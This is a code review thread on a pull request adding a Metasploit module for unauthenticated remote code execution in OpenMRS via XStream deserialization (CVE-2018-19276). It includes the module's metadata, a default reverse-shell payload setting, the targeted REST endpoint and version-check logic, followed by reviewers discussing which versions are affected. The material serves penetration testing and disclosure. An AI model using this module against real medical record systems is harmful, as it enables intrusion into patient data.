modules/exploits/multi/http/openmrs_deserialization.rb

```diff
@@ -0,0 +1,135 @@
+    super(update_info(info,
+      'Name'           => 'OpenMRS Java Deserialization RCE',
+      'Description'    => %q(
+        OpenMRS is an open-source platform that supplies
+        users with a customizable medical record system.
+
+        There exists an object deserialization vulnerability
+        in the `webservices.rest` module used in OpenMRS Platform.
+        Unauthenticated remote code execution can be achieved
+        by sending a malicious XML payload to a Rest API endpoint
+        such as `/ws/rest/v1/concept`.
+
+        This module uses an XML payload generated with Marshalsec
+        that targets the ImageIO component of the XStream library.
+
+        Tested on OpenMRS Platform `v2.1.2` and `v2.21` with Java
+        8 and Java 9.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Nicolas Serra', # Vuln Discovery and PoC
+        'mpgn',          # PoC
+        'Shelby Pace'    # Metasploit Module
+      ],
+      'References'     =>
+       [
+         [ 'CVE', '2018-19276' ],
+         [ 'URL', 'https://talk.openmrs.org/t/critical-security-advisory-cve-2018-19276-2019-02-04/21607' ],
+         [ 'URL', 'https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization' ],
+         [ 'URL', 'https://github.com/mpgn/CVE-2018-19276/' ]
+       ],
+      'Platform'       => 'unix',
+      'Arch'           => ARCH_CMD,
+      'Targets'        =>
+       [
+         [ 'Linux',
+           {
+             'Arch'            =>  ARCH_CMD,
+             'Platform'        =>  'unix',
+             'Payload'         =>  'cmd/unix/reverse',
+           }
+         ]
+       ],
+      'DisclosureDate' => '2019-02-04',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+    [
+      Opt::RPORT(8081),
+      OptString.new('TARGETURI', [ true, 'Base URI for OpenMRS', '/' ])
+    ])
+
+    register_advanced_options([ OptBool.new('ForceExploit', [ false, 'Override check result', false ]) ])
+  end
+
+  def check
+    res = send_request_cgi!('method' => 'GET', 'uri' => normalize_uri(target_uri.path))
+    return CheckCode::Unknown("OpenMRS page unreachable.") unless res
+
+    return CheckCode::Safe('Page discovered is not OpenMRS.') unless res.body.downcase.include?('openmrs')
+    response = res.get_html_document
+    version = response.at('body//h3')
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version && version.text
+
+    version_no = version.text
+    version_no = version_no.match(/\d\.\d+\.\d*/)
+    return CheckCode::Detected('Successfully identified OpenMRS, but cannot detect version') unless version_no
+
+    version_no = Gem::Version.new(version_no)
+    not_vuln = Gem::Version.new('2.1.4')
+
+    return CheckCode::Appears("OpenMRS platform version: #{version_no}") if (version_no < not_vuln) && ![ Gem::Version.new('1.11.8'), Gem::Version.new('1.11.9') ].include?(version_no)
```

Comment:
Is `1.11.9` guaranteed to be the end of the `1.11.x` branch, and versions `< 1.11.8` vulnerable?

Also, the conditional line is egregiously long, weighing in at a staggering 183 bytes.

I presume the logic here is meant to describe that the target is vulnerable so long as the version is `2.x < 2.1.4` or `< 1.11.8`; in which case:

```ruby
version_no = Gem::Version.new(version_no)

if (version_no < Gem::Version.new('1.11.8') || version_no.between?(Gem::Version.new('2'), Gem::Version.new('2.1.3'))
  return CheckCode::Appears("OpenMRS platform version: #{version_no}")
end
```

Reply:
The vulnerability writeup from [bishopfox](https://know.bishopfox.com/advisories/news/2019/02/openmrs-insecure-object-deserialization) mentions that specifically `v1.11.8` and `v.1.11.9` are not vulnerable. All of the other versions should be included.

Reply:
Interesting

![OpenMRS vulnerable versions](https://user-images.githubusercontent.com/434827/70086950-7d6d9e80-1667-11ea-82ee-f3d7c414cb83.png)

It looks like `1.11.9`, released in early 2018, was the last of the `1.11.x` branch. It's probably safe to assume that all `1.11.x` versions from `1.11.8` onward are unaffected, but up to you.

Reply:
Welp, I thought there were more than that. Made your suggested change!